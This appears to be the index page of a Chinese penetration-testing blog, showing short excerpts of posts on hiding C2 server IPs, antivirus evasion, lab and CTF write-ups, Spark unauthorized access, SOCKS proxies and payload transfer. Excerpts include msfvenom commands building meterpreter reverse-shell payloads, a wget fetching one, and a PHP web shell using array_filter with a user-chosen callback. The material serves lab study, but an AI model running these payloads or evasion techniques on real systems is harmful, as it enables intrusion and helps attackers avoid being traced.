流量隐藏 简介流量隐藏是实战中最重要的 域名上线隐藏IP隐藏ip的重要性在使用MSF或者CS获得目标机Sessions或者Beacon时,如果直接使用自己的VPS作为MSF或CS的服 务器时,容易被溯源到攻击者所在VPS主机IP。 域名上线原理当我们访问域名时会经过域名解析,域名解析就是将域名转换到IP地址的过程,我们通过域名访问服 务器,实际上是访问的目标服务器IP地址 A记录 将域名指 2024-01-30 #渗透
免杀 简介本文章只是简单提及 基础篇免杀的概念 免杀技术全称为反杀毒技术Anti Anti-Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。 – 百度百科 常见的免杀方式 静态 2024-01-29 #免杀
RedSun02 简介开始时间 : 2024-1-27 20:37 完全渗透 : 2024-1-30 20:37 环境搭建下次一定记录 信息收集前提条件是我们已经获取了ip web 192.168.79.142 那就直接扫描端口 pc主机应该是有防火墙,所以扫描不到(这个后面不作为已知信息) 但是Windwos防火墙防止了ICMP,我们直接no ping 拿下 web渗透发现142主机有一个web服务 尝 2024-01-27 #靶场记录
Spark未授权访问 介绍apache顶级项目,大规模数据处理计算引擎。为了方便的给使用者控制系统进行计算和查看任务结果,提供了WebUI图形化界面和相应的REST API方便用户操作。支持用户向管理节点提交应用,并分发给集群使用,如果管理节点未启用ACL(访问控制),我们便可在集群中执行任意代码。 环境搭建进入vulhub-master/spark/unacc 使用 1docker-compos 2024-01-25 #漏洞复现
代码审计 [GDOUCTF 2023]受不了一点0x00 这个就是代码审计 123456789101112131415161718192021222324252627282930313233343536373839404142434445<?phperror_reporting(0);header("Content-type:text/html;charset=utf-8");if 2024-01-25 #CTF刷题记录
Socks代理 socks简介 SOCKS是一种网络传输协议,主要用于客户端与外网服务器之间通讯的中间传递。 根据OSI模型,SOCKS是会话层的协议,位于表示层与传输层之间。 使用TCP协议传输数据,因而不提供如传递 ICMP 信息之类的网络层网关服务 由于socks是会话层的代理,不提供ICMP的代理,所以ping 是代理不了的 socks代理 被代理端与代理服务器通过 SOCKS4/5 2024-01-25 #渗透
total [NISACTF 2022]level-up0x00 记录一下我第一次遇到的较为综合的题目 使用的知识点 扫描目录 md5 碰撞 sha1加密 0x01 这个地方其实其实什么东西也没有有,但是我们需要利用这一关到达下面的关卡 找到第二关 0x02 12345678910111213141516171819202122<?php//here is level 2error_report 2024-01-23 #CTF刷题记录
linux文件传输 生成payload首先我们得生成一个linux下的可执行文件.elf 1msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.79.138 lport=9999 -f elf -o linux_64_9999.elf wget下载指定的文件 12wget http://192.168.81.229/5555.elf -P /t 2024-01-22 #渗透
windows文件传输 BitsadminBITSAdmin 是一个命令行工具,可以使用它创建下载或上传作业,并监视其进度。 缺点不能下载python 开启的http服务,必须是真实的http 服务 现在尝试使用 生成payload1msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.81.238 lport=6666 -f hta-psh &g 2024-01-22 #渗透
php_exec array_filter12345678910<?php $cmd=$_POST['cmd'];$array1=array($cmd);$func =$_GET['func'];array_filter($array1,$func);//用回调函数过滤数组中的元素:array_filter(数组,函数)//?func=system//cmd=whoam 2024-01-22 #靶场记录